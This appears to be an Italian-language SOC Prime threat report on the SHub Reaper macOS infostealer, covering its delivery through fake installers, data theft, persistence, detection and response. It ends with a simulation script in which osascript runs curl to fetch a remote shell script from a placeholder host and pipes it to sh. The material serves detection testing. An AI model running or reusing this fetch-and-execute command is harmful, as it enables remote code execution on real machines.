SOC Prime Bias: Medio

20 May 2026 22:15 UTC

SHub Reaper | Il ladro macOS inganna Apple, Google e Microsoft in una singola catena di attacco

Author Photo
SOC Prime Team linkedin icon Segui
SHub Reaper | Il ladro macOS inganna Apple, Google e Microsoft in una singola catena di attacco
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Il report analizza una nuova variante di infostealer per macOS chiamata SHub Reaper, che utilizza installatori falsi di WeChat e Miro per consegnare un payload AppleScript malevolo attraverso un dominio Microsoft tematico con errori di battitura. Una volta avviato in Script Editor, il payload raccoglie dati del browser, file del portafoglio di criptovalute e informazioni sul portachiavi, quindi esfiltra i contenuti rubati come archivi ZIP segmentati. Il malware altera anche i file del portafoglio e stabilisce la persistenza attraverso un LaunchAgent mascherato da aggiornamento software di Google. La rilevazione raccomandata si concentra sull’esecuzione di AppleScript, sulla creazione sospetta di LaunchAgent e sul traffico in uscita verso l’infrastruttura di comando e controllo nota.

Indagine

SentinelOne ha monitorato l’intera catena di consegna multi-stadio, inclusi l’abuso dello schema applescript:// , la generazione dinamica del payload AppleScript e un modulo di acquisizione file che rispecchia il comportamento di furto di documenti visto in AMOS. I ricercatori hanno catturato il traffico di rete verso il dominio di comando e controllo hebsbsbzjsjshduxbs.xyz e endpoint correlati, insieme alla creazione di file temporanei sotto /tmp e un LaunchAgent posizionato nella directory Library dell’utente. L’indagine ha anche rivelato funzionalità di bot Telegram codificate durevolmente usate per la telemetria degli operatori.

Mitigazione

I difensori dovrebbero bloccare l’accesso ai domini con errori di battitura mlcrosoft.co.com, qq-0732gwh22.com, e mlroweb.com, e monitorare i LaunchAgent creati sotto i percorsi che imitano i componenti di aggiornamento di Google. Si dovrebbe usare una lista di applicazioni consentite per limitare l’esecuzione di AppleScript da fonti non attendibili, e dovrebbe essere applicata una verifica rigorosa della firma del codice. Le rilevazioni di rete dovrebbero anche avvisare sulla comunicazione con il dominio di comando e controllo identificato e sui suoi percorsi API noti.

Risposta

Se viene rilevata attività di SHub Reaper, isolare immediatamente l’endpoint interessato, terminare eventuali processi sospetti di AppleScript o LaunchAgent, e rimuovere i file malevoli da /tmp e dalla Libreria utente. Gli investigatori dovrebbero quindi eseguire una raccolta forense completa degli archivi dati del browser, delle directory dei portafogli e dei repository delle credenziali, seguita da reset delle credenziali dove si sospetta una compromissione. L’infrastruttura di comando e controllo identificata dovrebbe essere bloccata, e il team di risposta agli incidenti dovrebbe avviare una caccia alle minacce più ampia su tutta l’ambiente.

Flusso di Attacco

Esecuzione della Simulazione

Prerequisito: Il Controllo Prevolo della Telemetria e Base deve essere stato completato con successo.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione dell’Attacco e Comandi:
    L’attaccante crea una stringa concisa che utilizza osascript per eseguire un comando shell. All’interno dell’AppleScript, do shell script esegue curl per scaricare uno script shell remoto (payload.sh) e lo indirizza direttamente a sh per l’esecuzione. Poiché l’intera catena è incorporata in una singola invocazione AppleScript, macOS registra un singolo evento process_creation il cui command line contiene entrambi osascript and curl, soddisfacendo la regola di rilevamento.

  • Script di Test di Regressione:

    #!/bin/bash
    #
    # Simula l'esecuzione di SHub Reaper su macOS
    # Genera un singolo evento di creazione processo contenente sia 'osascript' che 'curl'
    #
    MALICIOUS_URL="https://malicious.example.com/payload.sh"
    
    # Una stringa: osascript esegue un comando shell che scarica il payload ed esegue
    osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""
  • Comandi di Pulizia:

    #!/bin/bash
    #
    # Pulisce eventuali artefatti creati dalla simulazione.
    # Il payload funziona in memoria e non scrive file, ma ci assicuriamo che non ci siano processi rimanenti.
    #
    # Termina eventuali processi 'sh' rimasti avviati dal test (da usare con cautela su sistemi di produzione)
    pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"